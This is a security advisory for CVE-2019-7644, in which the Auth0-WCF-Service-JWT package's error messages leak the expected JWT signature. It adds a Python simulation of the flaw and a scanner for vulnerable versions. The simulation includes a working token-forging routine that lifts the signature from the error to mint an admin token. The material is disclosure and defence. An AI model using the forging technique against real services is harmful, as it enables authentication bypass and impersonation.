
> CVE-2019-7644: Security vulnerability in Auth0-WCF-Service-JWT for ASP.NET

# CVE-2019-7644: Security Vulnerability in Auth0-WCF-Service-JWT

**Published**: February 15, 2019

**CVE number**: CVE-2019-7644

**Credit**: Conny Dahlgren, Security Researcher at DevilSec AB

## Overview

All versions of the [Auth0-WCF-Service-JWT](https://www.nuget.org/packages/Auth0-WCF-Service-JWT/) NuGet package lower than 1.0.4 include sensitive information about the expected JSON Web Token (JWT) signature in the error message emitted when JWT signature validation fails:

`Invalid signature. Expected 8Qh5lJ5gSaQylkSdaCIDBoOqKzhoJ0Nutkkap8RgB1Y= got 8Qh5lJ5gSaQylkSdaCIDBoOqKzhoJ0Nutkkap8RgBOo=`

Because the message reveals the signature the library itself computed over the token it received, an attacker can submit a token with an arbitrary header and payload and any signature, read the expected signature out of the error, and resubmit the same token with that signature. The error message therefore acts as a signing oracle: attackers can forge tokens with claims of their choosing and bypass authentication and authorization.
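To make the overview concrete, the following is an added simulation of the oracle, written for this page and not code from the Auth0-WCF-Service-JWT library: an HS256 verifier whose exception message echoes the expected signature (the pre-1.0.4 behaviour), the hardened verifier beside it, and the attacker routine that turns one rejected request into a forged token. The server key, the claims and the `server_leaky`/`server_fixed` endpoints are constructed for the example; only the wording of the error message follows the page.

```python
import base64
import hashlib
import hmac
import json
from typing import Callable, Optional

# Constructed server-side HMAC key for the simulation; the attacker never sees it.
SERVER_KEY = b"example-server-hs256-key-do-not-reuse"


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def encode_unsigned(payload: dict) -> str:
    """The header.payload part of an HS256 JWT, i.e. the signing input."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    return f"{header}.{b64url(json.dumps(payload).encode())}"


def sign(signing_input: str, key: bytes) -> bytes:
    return hmac.new(key, signing_input.encode(), hashlib.sha256).digest()


def make_jwt(payload: dict, key: bytes) -> str:
    """What a legitimate issuer produces; used only to show the forgery is byte-identical."""
    unsigned = encode_unsigned(payload)
    return f"{unsigned}.{b64url(sign(unsigned, key))}"


class InvalidSignature(Exception):
    pass


def verify_leaky(token: str, key: bytes) -> dict:
    """Mimics the pre-1.0.4 behaviour described on this page: the exception
    message carries the signature the verifier expected (standard base64)."""
    header, body, sig = token.split(".")
    expected = sign(f"{header}.{body}", key)
    got = b64url_decode(sig)
    if not hmac.compare_digest(expected, got):
        raise InvalidSignature(
            f"Invalid signature. Expected {base64.b64encode(expected).decode()} "
            f"got {base64.b64encode(got).decode()}"
        )
    return json.loads(b64url_decode(body))


def verify_fixed(token: str, key: bytes) -> dict:
    """Hardened form: the message says only that validation failed."""
    header, body, sig = token.split(".")
    if not hmac.compare_digest(sign(f"{header}.{body}", key), b64url_decode(sig)):
        raise InvalidSignature("Invalid signature.")
    return json.loads(b64url_decode(body))


# The endpoints an attacker can reach: they bind the key; the attacker sees only tokens and errors.
def server_leaky(token: str) -> dict:
    return verify_leaky(token, SERVER_KEY)


def server_fixed(token: str) -> dict:
    return verify_fixed(token, SERVER_KEY)


def forge_via_oracle(payload: dict, server: Callable[[str], dict]) -> Optional[str]:
    """Attacker side: submit the chosen claims with a bogus signature, lift the
    expected signature out of the error text, and resubmit. Returns the forged
    token, or None when the server does not leak the expected value."""
    unsigned = encode_unsigned(payload)
    bogus_sig = b64url(bytes(32))  # 32 zero bytes, the length of an HMAC-SHA256 tag
    bogus = f"{unsigned}.{bogus_sig}"
    try:
        server(bogus)
    except InvalidSignature as exc:
        msg = str(exc)
        if "Expected " not in msg or " got " not in msg:
            return None
        expected_b64 = msg.split("Expected ", 1)[1].split(" got ", 1)[0]
        return f"{unsigned}.{b64url(base64.b64decode(expected_b64))}"
    return bogus  # the bogus signature was accepted: a different bug, but still a forged token


if __name__ == "__main__":
    claims = {"sub": "attacker", "role": "admin"}
    forged = forge_via_oracle(claims, server_leaky)
    print("leaky server accepts forged token:", server_leaky(forged) == claims)
    print("fixed server leaks a signature:", forge_via_oracle(claims, server_fixed) is not None)
```

Note that the attacker needs exactly one rejected request per forged token and never learns the key; the fix is not a different algorithm but simply not echoing the computed signature. The same applies to any verifier that logs the expected MAC, which is why the "Am I affected?" section below counts logs and diagnostic output as exposure.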

## Am I affected?

You are affected by this vulnerability if the following conditions apply:

* You use a version of [Auth0-WCF-Service-JWT](https://www.nuget.org/packages/Auth0-WCF-Service-JWT/) NuGet package lower than 1.0.4
* You show the signature verification exception message in the user interface or otherwise make it available to an attacker (for example through logs or diagnostic messages)
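As an added check that is not part of the advisory, the following script scans a `packages.config` or a `.csproj` for references to the package below 1.0.4 (the first condition above). The sample project files are constructed for the example; the version comparison follows NuGet's rule that a pre-release such as `1.0.4-beta` sorts before `1.0.4` and so still counts as vulnerable.

```python
import re
import xml.etree.ElementTree as ET
from typing import List, Optional

PACKAGE_ID = "Auth0-WCF-Service-JWT"
# (major, minor, patch, release flag); the flag is 0 for pre-releases so that
# 1.0.4-beta1 < 1.0.4, as NuGet orders them.
FIXED_VERSION = (1, 0, 4, 1)


def parse_version(version: str) -> tuple:
    """Numeric part of a NuGet version padded to three fields, plus a release flag."""
    m = re.match(r"(\d+(?:\.\d+)*)(-[0-9A-Za-z.-]+)?", version.strip())
    if not m:
        raise ValueError(f"unparseable version: {version!r}")
    parts = [int(p) for p in m.group(1).split(".")]
    release_flag = 0 if m.group(2) else 1
    return tuple((parts + [0, 0, 0])[:3]) + (release_flag,)


def _local(tag: str) -> str:
    """Strip the MSBuild XML namespace that old-style csproj files carry."""
    return tag.rsplit("}", 1)[-1]


def find_versions(xml_text: str) -> List[str]:
    """Every version of the package referenced in a packages.config
    (<package id= version=>) or a csproj (<PackageReference Include= Version=>
    or with a nested <Version> element)."""
    root = ET.fromstring(xml_text)
    found: List[str] = []
    for el in root.iter():
        tag = _local(el.tag)
        version: Optional[str] = None
        if tag == "package" and (el.get("id") or "").lower() == PACKAGE_ID.lower():
            version = el.get("version")
        elif tag == "PackageReference" and (el.get("Include") or "").lower() == PACKAGE_ID.lower():
            version = el.get("Version")
            if version is None:
                for child in el:
                    if _local(child.tag) == "Version":
                        version = child.text
        if version:
            found.append(version.strip())
    return found


def vulnerable_versions(xml_text: str) -> List[str]:
    """Referenced versions that are below the fixed release 1.0.4."""
    return [v for v in find_versions(xml_text) if parse_version(v) < FIXED_VERSION]


# Constructed sample project files for the example.
PACKAGES_CONFIG = """<packages>
  <package id="Auth0-WCF-Service-JWT" version="1.0.3" targetFramework="net461" />
  <package id="Newtonsoft.Json" version="12.0.1" targetFramework="net461" />
</packages>
"""

CSPROJ_OLD_STYLE = """<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemGroup>
    <PackageReference Include="Auth0-WCF-Service-JWT">
      <Version>1.0.4</Version>
    </PackageReference>
  </ItemGroup>
</Project>
"""

CSPROJ_SDK_STYLE = """<Project Sdk="Microsoft.NET.Sdk">
  <ItemGroup>
    <PackageReference Include="Auth0-WCF-Service-JWT" Version="1.0.2" />
  </ItemGroup>
</Project>
"""

if __name__ == "__main__":
    for name, text in [("packages.config", PACKAGES_CONFIG),
                       ("old csproj", CSPROJ_OLD_STYLE),
                       ("SDK csproj", CSPROJ_SDK_STYLE)]:
        print(name, "->", vulnerable_versions(text) or "not affected")
```

The second condition, whether the exception text reaches a user or a log, cannot be read off a project file; check the WCF error handling and logging configuration for paths that surface exception messages to callers.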

## How do I fix this?

Developers using the [Auth0-WCF-Service-JWT](https://www.nuget.org/packages/Auth0-WCF-Service-JWT/) library need to upgrade to version 1.0.4 (the latest version at the time of publication) or later.

The updated package is available on [NuGet](https://www.nuget.org): `Install-Package Auth0-WCF-Service-JWT -Version 1.0.4`

### Will this update impact my users?

No. This fix patches the library that your application runs, but will not impact your users, their current state, or any existing sessions.
